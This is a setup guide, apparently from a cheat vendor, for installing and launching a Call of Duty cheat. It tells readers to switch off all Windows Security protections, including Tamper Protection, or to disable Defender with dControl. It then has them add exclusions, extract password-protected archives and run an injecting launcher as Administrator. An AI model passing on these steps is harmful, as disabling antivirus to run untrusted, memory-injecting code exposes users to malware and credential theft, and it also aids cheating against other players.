# HAZ COD Series
#### Getting Started

Windows Security can block the launcher before it opens. This happens because the file uses behavior that looks suspicious to Microsoft, such as injection and protected memory access.

This is required only to prevent Windows Security from quarantining, deleting, or blocking the launcher during setup.

**Disable Windows Security**
1. Open **Windows Security**.
2. Go to **Virus & threat protection**.
3. Click **Manage settings** under **Virus & threat protection settings**.
4. Turn **Off** these options:
* **Real-time protection**
* **Cloud-delivered protection**
* **Automatic sample submission**
* **Tamper Protection**
**Add an exclusion**
1. Return to **Virus & threat protection**.
2. Open **Manage settings**.
3. Scroll to **Exclusions** and click **Add or remove exclusions**.
4. Add the folder where you keep the launcher and extracted files.

**Alternatively:**
1. Install dControl, a tool that allows you to easily turn Windows Defender on or off.
2. The password to extract the file is: **HAZ**

If you skip these steps, Windows may remove the file automatically or stop it from launching.

You can turn these protections back on after you finish using the cheat.

Some games cause their Anti-Cheat to run in the background even when the game isn't being played, this can cause issues for when you are trying to launch the cheat as they can block it.

Our cheat uses C++ to render everything so in order to make sure that every function is working for you, you must install the following C++ Runtime Components

This is a standard Microsoft component used by many applications. Installing it ensures everything runs smoothly and securely.

#### Launch Guide

**Install Launcher**
Download and install the latest version of the launcher to begin setup
Install Launcher (Password = dull)
If the link fails to load, use a VPN such as [**Proton VPN**](https://protonvpn.com/free-vpn), then refresh the page and try again.

**Run Launcher**
After extracting it, run the launcher as **Administrator**, then enter your license key from your [**Purchase History**](https://ghostcheats.com/clients/purchases/)

**Launching Process**
After your license is accepted, the cheat will automatically load. This usually takes around **30 seconds**.

**Open Cheat**
Once you’re in-game, press **INS** to open the cheat menu

Press **INS** to open or close the in-game menu.
If your keyboard does not have an **INS** key, use the **Windows On-Screen Keyboard** instead.
